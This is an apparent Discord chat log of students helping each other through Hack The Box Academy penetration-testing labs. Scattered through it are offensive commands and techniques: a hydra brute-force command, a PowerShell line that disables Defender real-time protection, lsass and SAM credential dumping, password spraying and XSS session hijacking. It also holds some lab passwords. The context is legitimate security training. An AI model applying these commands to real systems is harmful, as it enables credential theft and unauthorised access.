Anyone know why I am getting an error loop of “could not find stored procedure ‘EOF’” when attempting to run mssqlclient.exe with Evil-WinRM by chance? This is for question 3 on Active Directory enumeration & attacks “Privileged Access”
I’ve had similar issues with running mimikatz on Evil-WinRM. It would just loop a mimikatz prompt.
using the correct hostname also helps
Hey all decided to ask this here because everyone is pretty informed in this channel and its pretty active. Is Footprinting also classified as active enumeration or just passive?
Thank you for the input. Unfortunately I received an error stating -fs and -fw are unrecognized arguments. Maybe I am inputting the flag in the wrong spot?
in ffuf ?
Mostly active
-fs 986
I ve a problem too xD
I attempted inputting host academy-ea-db01 but received the following…is this the incorrect hostname too?
dont think i was referring to your screenshot
moreso this one
Oh, yeah. Was not using ffuf. Using evil-winrm. Thank you though 🙂
no problem :)
Module name: Password Attacks
Section name: Attacking lsass
#Question: Apply the concepts taught in this section to obtain the password to the Vendor user account on the target. Submit the clear-text password as the answer. (Format: Case sensitive)
i stuck at this step
@wide river did u install the tool well
it already in my VB
@wide river try to provide it without the path
@wide river no like pypykatz lsa minidump lsass.dump
@wide river maybe use crackmapexec
Guys .Quick question. I downloaded the flag.txt on smbclient. Where the flag is stored ?
@wet jolt use locate
Didn't find 😦
I cannot complete the exercies without the flag xD
@wet jolt like locate flag.txt
i did both.
thanks for help btw
@wet jolt download the flag again
locate flag.txt
/var/lib/plocate/plocate.db: No such file or directory
i did it Ahhh bro
I'm feeling dumb
cannot locate this damn flag
How about locate flag.*
smb: \flag> get flag.txt
getting file \flag\flag.txt of size 33 as flag.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \flag>
nope again my friend
Hi, I'm having an issue with the Footprinting Lab - Hard. Trying to ssh to the target but after changing permissions to 400 or 600, I still get the invalid format for my key file. I tried changing || the header and footer to RSA or OPENSSH PRIVATE KEY || but no success. Am I on the right or wrong path here?
Ok
@placid quest
@wide river -lsa
@wide river account privileges is not allowed to do that
hey,
i just made a htb account and I wanna try out but I got some problems can someone help?
so when I go full screen i can see linux for 2 sec and then the site goes blank
like it connecting and after a few seconds its disconnected
Hi all. I'm getting a TLS error when RDP on Windows Privesc: Windows Server section. Before I go trouble shooting is this normal? It's been fine on all the other boxes.
Oh even the attack box is giving me errors, so presumably a HTB issue.
xfreerdp gives tls errors if you use the wrong credentials if I remember correctly
I've been using Remmina and it's giving TLS errors before I even get password prompt.
the Linux icon in the file manager
Next box is absolutely fine too, so a specific issue with the Windows 2008 Server. Presumably something wrong in my settings.
Ack. So many people hate metasploit online!
Nah they dont hate it, they hate people using it
It's a weird one, I think it's helpful to use it as a beginner (especially me being a n00b)
metasploit is undeniably a powerful tool thats easy to use. Which leads to a lot of people knowing the basics of running it and thinking that makes them a 1337 hacker
So its a "if youre nothing without the tool you dont deserve the tool" situation
I'm still relying on it, mostly because I keep having to go over stuff.
Just saw some people online being pretty harsh on people using it
Whats a 1337 hacker?
leet speak for elite
(if I'm not wrong)
The hacker community is a pretty eclectic sub-culture. Take opinions with a grain of salt.
Iknowiknowww
I've reached that brick wall right now. Just got onto SQL and its a lot of reading.
wait till you do the AD enumeration and attacks module
Did AD Enum
(horrific)
I was trying the lame box earlier but I can't get anything off it
I'm taking a day off so I don't burn out bleh
Take a break and refresh your mind. For lame make sure to enumerate everything and to read Exploit poc's.
If you do that the box will be ez dubs.
Also it is ok to use writeups and ippsec😉
I'll keep it on board!
Anyone able to help me on Easy Nmap IDS/IPS
Need help with dns
DM
what about DNS?
Can I dm someone about chisel port forwarding?
Nope. Doesn't help that the remote machine keeps disconnecting too
Anyone around for a question with Nmap IDS/IPS med
ask away
how do we start w/ this discord? where are the problem sets to begin w/
hello did someone do this one
- 0 Were absolute or relative sequence numbers used during the capture? (see question-1.zip to answer)
in Tcpdump Fundamentals
How do I decrypt tls_ECDHE_RSA_WITH_AES_128_GCM_SHA256 wireshark, I made my SSLKEYLOGFILE and it has keys, and I setup the file in wireshark, it decrypts http requests but it seems that wireshark has problems with ECDHE
however, fiddler does it perfectly fine, but fiddler is strictly http
Or task
Hello I am in the Section Footprinting in the Pentester job role path I am stuck on 2 labs in the FTP section have tried everything and no luck.
Did you get your chisel problem fixed?
yep
Would anyone know how to do the FTP Footprinting lab I tried Nmap and other resources but no luck
did you figure this out?
Hey I have a question I am in the Penetration Tester and doing the first lab in Footprinting and the question
Which version of the FTP server is running on the target system? Submit the entire banner as the answer.
I am stuck on this
What have you tried?
I have tried nmap scan login with anonymous in the FTP server telnet nc and just about everything that is in the reading section before the lab
Can you be more specific? Like what commands have you run... feel free to DM.
ok
The only passwords I find are 'l#-x9r11_2_GL!' and '5erv3rAdmin!' but neither of them are the answer. Do I need to search for something other than "password" or "bob_adm"?
I would have to go back and find all that I did
I know I tried to script vuln in Nmap and tried to do anonymous entry into the FTP server
trying to find vuln in FTP port 21
Like using the -sV flag?
Can you show me your output when you run with the -sV -sC -A flags?
That's fine
No
I try to submit the root flag but it say wrong answer
sent you dm
Hi, did you manage to get this to work yet?
Anyone manage to get Q2 from Bleeding Edge Vulnerabilities section of AD.
It asks to get flag from DC01 as administrator, but the username in the question can't login, and both vulnerabilities seem to have issues. (printnightmare & PetitPotam)
Are you using scanner.py? If so, what's your syntax.
yeah 'noPac' does work just fine.
But I was more interested to test using printnightmare or PetitPotam. I was trying to replicate the exercise to see how the POC works.
I didn't test print or petit. The shell was screwy because you couldn't cd effectively.
yea CD doesn't work. you got to use Full paths
You could just add an admin and evil-winrm, or just snipe the flag and cat/type it. I had issues at first as well.
I can get the flag just fine. I was only interested in trying to replicate the printnightmare and PetitPotam exercises without issues
hello @everyone has someone completed the Local File Inclusion Module i am stuck on the skill assessment need help please 🤲
anyone on that has done the Web Service and API attacks skills assessment? currently stuck. need some hints or something
What part are you stuck on? If you are on the initial step, try to read the php source code using a method covered in the module.
hello friend can i please DM you ?
sure
hey did anyone here complete the windows command line module?
Hi, it's a good read about Web Application firewalls. https://blog.securelayer7.net/web-application-firewall/
anyone?
Greetings! Anyone got anny issues with the Attacking SAM exercises!
I can't move the hives from the machine to my pwnbox :/ :/ I get access denied!
@rustic sage did u try with evil-winrm
No luck 😦 I get different errors...
in the section did you try the method under Creating a Share with smbserver.py? also i can't remember but if you got RDP then you can just use updog
i did shoot me a dm if you still need help with that
@vital adder I think u can use crackmapexec to dump sam database
what's the issue? also shoot me a dm if you still need help with that
yep... but first I need the 3 .saves files in my machine 😦
yep i think that's the second method i use for that section
I can't transfer the files through the smbserver.py
what's the issue?
i didn't use that method for this but i don't see how it can't work for this
In the CMD of the machine gives me "Access denied" if I use xfreerdp and "The specified server cannot perform the requested operation" right after I type the move command
I have tried xfreerdp and evil-winrm
maybe it's something in the smbserver command...
i'll give that method a try but you can just use updog
updog is a tool?!
||Password is an XML file||
I can't help you more than that 😅
Thanks man!! I will try it!
does anyone have a convenient way of making a users lists using kerbrute's userenum's output?
Not that it matters but i'm almost done with the CPTS pathway, what a ride it has been. Learned new stuff from every module, and i still have a long long way to go.
being l33t is no easy task
Im with updog but I cant find the shared folder...
so when you run updog the directory that you run it in is the share folder
I'm trying to download something from the machine...
and on your target machine go to your ip with port 9090 ( in a browser) and upload your file from there
ohhh oko k!
also i just give the example method a try and it seem to be working fine for me
Ohhh ok!!!
On the active directory module, the SSH creds on the DCSync chapter dont seem to work. Is someone familiar with this issue?
No luck for me with that one... I get the "the specified server cannot perform the requested operation"
I have it exactly the same as you...
wait wait!
I'm going to copy the files to desktop like you
I have them in the C:|
@rustic sage provide the directory where u will save the file
no idea but i'm guessing you host the smb server a directory you don't have write permission?
wait.. Im going to try it with powershell...
also here is the updog method if you still need help with that you can just go to your ip on port 9090 and select the file you need and click upload (if something isn't working right just give the page a refresh)
just use updog or hell use crackmapexec like one of the last example
What is the use of updog?? Can someone explain?
just basically for uploading and downloading file
it's use the http simple server (python)
I see it's like a local webserver with GUI features
yes basically it is
no idea i don't need that for simple uploading file so i never use that but if it work with python http simple server it should work with updog
wait no it do 🤣
It has to or else it will be of no use to red teamers 😅
Im using updog now haha its taking a while but I guess its because the files are quite big
Works nicely 🙂 🙂 🙂 🙂 🙂
👍
Thanks!!!!!!!
This Windows Privesc Server 2008 box is not happy. :/
So painful.
Has anyone done this Module?
which module? the windows privilege escalation one?
Yes. The Windows Server section is just awful. Box can't connect via RDP. If I use the browser box it just disconnects constantly.
Every other box is fine for me. Just this specific Win 2008 Server.
What's worse is it's just a silly Metasploit autopwn flag, so it'll only take a moment.
oh yeah i did note down the target is so old there is no wget
for this you have to make a normal rev shell and on the target download it via browser and because there is no wget you can't use web_delivery for this
Yes brahh
I can't even get the RDP session stable.
but after you got a shell you should be able to use something like exploit suggester
i have no note about this but did you try remmina
Can't connect from local VM with xfreerdp or remmina. If I use a browser instance it takes a crap every few moments and needs to reconnect.
It's specific to this section, because I can relaunch any other box and it's fine.
if you have both the pwnbox and your vpn on that is the issue
both are trying to kick each other of the network so every few moments that happened
i'm in a module right now so i can't double check but try turn off both your vpn and the pwnbox after a bit only use one of them if the connection is a bit unstable i recommend using the pwnbox
Eh I can't get it to work at all locally through VM so just battle the attack box.
It was the last module left undone before I do the assessment
I don't solve it
Question on Attacking Common Applications Skills Assessment Question 4. I solved it and got the flag (with the help of previous questions asked). My question is how were we meant to know that the particular |servlet| was accessible? If you access the page, it 404s so it doesn't show up when you use something like gobuster.
Hello. I am having issues with the getting started module.
In the public exploits section i cant connect to the target machine
I am using the provided Pwnbox
Nvm it is working now
skills
Oh the skills assessments were easy for the Windows Priv Esc module. :-s
Was expecting it to be hard given all I've learned haha
has anyone done RDP and SOCKS Tunneling with SocksOverRDP within Pivoting, Tunneling, and Port Forwarding, and had issues with Windows deleting the .dll files?
L anyone experienced with Windows? It looks like all Firewalls and Defender are disabled and I executed Set-MpPreference -DisableRealtimeMonitoring $true, but Windows is still removing the .dll🫠
It's a shame there's no evasion / obfuscation module.
some of the modules have sections about it, but they really don't teach you anything. It's more theory / you "CAN" do this, but you need to do the outside research. Which I have in most cases.
I just don't know why it's enabled for this lab if up to this point (and I've been doing CPTS in order) there has been nothing about getting around this besides Set-MpPreference -DisableRealtimeMonitoring $true.
THM have a bunch of modules on EDR evasion / obfuscation etc. I've no idea if they're any good but I'm thinking of a 1 month sub just to do them all at some point.
I feel like a solid evasion module would be a worthy addition to their PNPT course.
Hey everyone, I am new in the cyber security field. Can anyone suggest where to start? Thank you
HTB Academy
What's that? How can I start my career in the field
most definitely, the HTB team has been putting in a lot of work for new modules so maybe there is one on the horizon
Start with networking.
🖤
I'll check out the website. Any certificate that u can suggest for an entry level roles
Do you guys have LinkedIn?
Network +
Programming & Social Engineering
Nice
I finished my bachelor degree in computer engineering and working towards a master in cyber security
Anyone got any idea why I might be having issues on the question for Operating System Structure under the Windows Fundamentals module? I have tried both the dir command and the tree command in both MATE terminal and powershell and it keeps saying that there is no C drive
real time protection for that machine is on you have to disable it by hand in windows security
also if the AV deletes the dll file and you get that same file back after disabling the AV that file is unusable
give both of these video a check if you are new to this
https://www.youtube.com/watch?v=0vu_Hs4N8B8
https://www.youtube.com/watch?v=lhz0-qAQlBM
so what command did you run and what's the issue?
HackThebox is a great place to start. Let me know if you have any questions.
😁
First thing I tried was dir c:\ /a and then I tried tree c:\ /f | more and both times I got a response saying there was no directory or no c drive
They really need to add this. 🤷🏻♂️
i got the same dir command in my note so if that doesn't try restart the target machine or something
also the more command in cmd is for reading file so i don't think you can use the more command like that
Huh?
Ok so stick with powershell for this command?
Thank
nope just use cmd for this
I can't find cmd on the target, is that the MATE terminal?
wait what? it's a windows target isn't it?
Yes
then how can it don't have a cmd??
I'm not sure, I may just be missing it but on the target and can't find cmd anywhere
Got this as a copypasta definitely hahah
If you give me a bit, Andy, I can check it out, I did that module.
i didn't do all of the evasion room on THM but a lot of them dive into C code stuff and i know nothing about that so not sure if i can even do all of them
Appears I made the same mistake as last time and have not learned I need to go to full screen, thank you for the help
oh yeah that's a thing now but for this you don't have to
I think for obfuscation it'll be important but you can bypass some older stuff just by removing all the comments in a piece of code before you compile it
only some of the rooms give you c code that you can compile and use on the target also right now i'm not sure but i think a big chunk of the rooms only give you like example code and you have to make some custom code for the actual target
all i can do is bash and some python so 😢
Does Set-MpPreference -DisableRealtimeMonitoring $true not disable it?
nope
Indicates whether to use real-time protection. If you specify a value of $False or do not specify a value, Windows Defender uses real-time protection. We recommend that you enable Windows Defender to use real-time protection.🤔
is that from the section?
That is from Window's documentation lol
gotta love Windows I guess... then again I have RDP so I probably should've confirmed it was off I just assumed the command worked as documented🤷♂️
ohhh you mean the command yeah that command usually works on most machines for me but not this for some reason
if tamper protection is on then that command will 100% not work but i don't think it is in this case
hello
hi 
now I learn htb academy Windows Fundamentals
there is a question
What protocol discussed in this section is used to share resources on the network using Windows? (Format: case sensitive)
||Server Message Block Protocol||
I write this answer a lot of time
but it doesn't receive it
try the short version of that also which section are you on?
NTFS vs. Share Permissions
🤦♂️ now it's right
thank you
np and 
Can we make this a macro
When someone says something like "Hi guys I'm new where do I start" have the bot reply with those 2 vids
yea i was think about that but not every one is going to ask that same thing and i don't want the bot to spam random people
Hello, I am brand new, is this the correct place to ask for help regarding HTB Academy modules?
or we just lock Academy channels until you verify your HTB or Academy account 🙂
yes
Can someone point me in the right direction of the web service and apis skill assessment. I've run burp, I've run sqlmap, I've found the easy sql vulns but I can't figure out what I actually need to do to get the right payload. I've tried the generic enumeration ones from the sql module, those don't work
Sweet. I'm also brand new to HTB and Linux and am currently taking the Linux Fundamentals module. I'm in the Services and Process Management section and attempting to follow along with the instructions but one of the first ones is to start OpenSSH with the command 'systemctl start ssh' when I do this it asks for a password. How do I find out the password I need? I tried the default ParrotOS password of 'toor' but that didn't work
SQL Injection never worked for me there. I did it via another method shown in the module
Website enumeration in the getting started module. I was trying the gobuster DNS method, but I am getting this error 
can I DM you about this and the Attacking Common Services Hard Skill Assessment?
sure
that dns option in gobuster is for domain not ip
you can't find a subdomain from an ip
Took me less than 10 minutes to find it once you said that 🤠 I wish I could figure out the sql part though
Anyone here somewhat familiar with IMAP over command line?
if you are in the Footprinting module try this https://donsutherland.org/crib/imap
https://www.atmail.com/blog/imap-101-manual-imap-sessions/ I was using this one, and its been completely useless for what im doing
#modules message (if you are new to hacking) and if you are on the pwnbox the password is on your desktop if you are in your own vm the password is the one you make when installing
yep found the same one that made me stuck for hours
I wish I could help but I have no idea about the SQL part. And from a discord search it seems that nobody did it that way
whew, im glad to read that! Thanks!
You are correct. I didn't even think to look at the GUI. Thank you kindly
if you make the correct exploit that can send a login request the sql payload is the easy part i don't have the source for my payload noted down but i think you should be able to find it in something like payload all the things
How can I view the message contents? I tried everything on that website, and nothing.... always errors, no idea what Im doing wrong
im missing something obvious... tried all of these, and nothing
As long as you select the right inbox Fetch should work fine
So close... so closeeeeeeeeeeee
@pine dagger I am trying to get there lol. Im at 40%
I took a 2 month break to do my CISSP, really trying to get this done before Christmas 🙂
Anyone mind nudging me on the footprinting hard lab? Enumerated SNMP but not sure what to do with what I got or if I got anything useful at all lol!
@pine dagger How long has it taken you? I started late last spring but I haven't really been grinding at it constantly.
pm me
I started in around July. I've been relatively methodical though, did all tier 0, then tier 1, tier 2. Im planning on finishing off the pen test and bug bounty paths, and then doing tier 3 and tier 4.
Then I'll start crashing through boxes
@pine dagger I am working towards doing the same
Anyone else with insights for IMAP? 2 hours now, and I've tried every combination I can think of to view some emails... Getting only syntax errors from here trying to read that 'EXISTS' ... all other folders are empty
Which module/chapter/question?
footprinting - hard lab
final Fing ly this module cost procrastinating for almost or over a month
https://academy.hackthebox.com/achievement/453129/163 i think i'll make pentest report / (better) write up for this but password protect with the final flag or something
We often encounter large and complex networks during our assessments. We must be comfortable approaching an internal or external network, regardless of the size, and be able to work through each phase of the penetration testing process to reach our goal. This module will guide students through a simulated penetration testing engagement, from sta...
hint you can basically use the same command you use in the IMAP section just a different ||mailbox||
theres no ID for the message though...
I've got notes... just not sure how to explain without just giving the answer.
join my server or die
no u
so how can I view ID's for messages to target it with the FETCH request?
Just the fetch command works
gimme a few... respawning, lol
do you got the list command in your note? i'm giving it a try right now most of the listing messages command doesn't work for me right now
I'll dm my notes?
The module told me to reboot. I hit restart inside the VM and it restarted the entire VM, erasing all my progress for the session. Is there a way to reboot without actually rebooting the VM?
well I got it... the docs im reading to get to it are horrendous, makes it seem like variables instead of copy/paste
Hello everyone, I am stuck on the cross-site scripting (xss) module - session hijacking part. I am listening with php 0.0.0.0:80 The main problem is even though I am using the same payload I am not getting anything back. I get only once and tried to connect 0.0.0.0:80
AD Enumeration/Attacks, Assessment Part 2 - were there any breadcrumbs leading up to ||Welcome1|| to spray? Had authenticated access and figured spraying was intended (over 2,900 users) - but that password to try was a pure guess.
with browser to see if I still can listen and I can
how can I share a screenshot here ??
I once saw someone say there is a directory that is persistent throughout restarts that you can store things in. Not sure tbh tho
ohhh the pwnbox
nope when you restart or terminate the pwnbox everything will be deleted
use ++verify at #bot-commands
Ah. I see. I think I'll start using my own VM's from now on
for the payload make sure you are using tun0 ip
Hey i'm stuck on the last question under "Skill Assessment - Website" in Login Brute Forcing. I got the first question which was brute forcing the site login, But for the second one I think i'm not using the right wordlists or maybe username? The cracking process was taking more than 20 minutes so I think I might be using the wrong ones or just the username isn't right. Or i'm just using the wrong fail string/ arguments. here's the command I was using for example hydra -l user -P ~/william.txt 178.62.88.151 -s 32160 -v -I http-post-form "/admin_login.php:username=^USER^&password=^PASS^:F=<form name='log-in'"
I tried rockyou.txt as well
Please see your DMs for instructions on how to verify your HTB account.
++verify
Please see your DMs for instructions on how to verify your HTB account.
thanks alot
hint that's the wrong ||parameter|| also if you are not brute forcing the username why are you still using ^USER^
ahh ok, so I should get rid of that portion, which part of the module should I re-read to make sure I get the right string?
i'm not sure but the part that used burp
or you can just login and log it through burp to get the right ||parameter ||
Out of curiosity, how often do yall utilize linpeas for privilege escalation?
It works now hahaha thx
i used to use linux exploit suggester with linpeas but now linpeas has that so i only use linpeas and i use it almost every time i need to privilege escalation on a linux machine (and metasploit exploit suggester)
I always do some manual checks first
the trick is run linpeas in the background and do some manual enum
idk with easy stuff at least Im usually finding the starting point faster than it takes to copy the script over lol
Thats what I am aiming to do. Needing to work on the manual part
flexing your manual enumeration also keeps you sharp. Linpeas is also a deluge of information even despite its highlighting. It's also not as great at lateral movement to other users which can be needed for some priv esc paths.
Makes sense
powerful powerful tool to use but something to keep in mind. Also in the real world youd want to drop as few files on target as possible. Linux tends to be more forgiving of this rule as a significant lack of AV being common but still something to keep in mind.
So I am just now learning how to use linux, I made myself a superuser in parrot linux, and I am trying to move my SecLists from my (user) folder to usr/share/wordlists so its easier on my brain to work in the training academy, but it says
the folder "SecLists" cannot be copied because you do not have permissions to create it in the destination
Do I have to be logged into root to be able to do this or am I missing something here
yes, or use the sudo command
Okay, what's the sudo command to move it from now desktop to that folder
(As I said, brand new to linux)
sudo -s will open up a root shell that should resolve any permissions issues. Use with caution.
Thank you
Then from your current working directory, you should be able to cp (name of your file) /usr/share/wordlists/name-of-your-file
Thank you, so what would be the command, sudo -s then cp (file) /usr/share/wordlists/(file)?
I dont want to end up having to reinstall linux because of this lol
Looks ok to me.
Okay, let me run that real quick then I will be right back
Im missing something here, cp: cannot stat 'file' : No such file or directory, should I run cp /desktop/file /usr/share/wordlists/file?
Sorry for bugging you again, I'm running it through burp suite and I think I have an idea of what i'm looking for, but I noticed the page isn't telling me that the login is failing, so I don't know how to have hydra check for failed logins since the site isn't reporting back a failed login, it's just blank. I also don't see anything in burp that points to a failed login. I could be missing the point here I am following the module and I've even looked at the man page for hydra to see what I might be missing
Yea, you just need to reference the full path to the file in that case. You're probably somewhere else in the file system.
hint the failed string ||you were using|| was right 🤣
oh omg
Might be /home/username/Desktop/file, or something along those lines.
hi
Anyone able to help me out with AD Enumeration & Attacks - Skills Assessment Part II question 7...
Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.
I have the creds neXXb:D@ta_XXXX_XXXXn! but when I use mssqlclient.py I get [-] ERROR(SQL01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
cp: -r not specified; omitting directory '/home/user/Desktop/SecLists'
This is something that will probably be "Oh yeah do this and it will work" and then I will feel like I should've learnt it LOL
I did it! cp /home/user/Desktop/file -r /usr/share/wordlists
That's how you do it, thank you Kulz
How long should I typically wait before I assume I did something wrong while its running the brute force command? Like 5 minutes maybe?
depends on the module



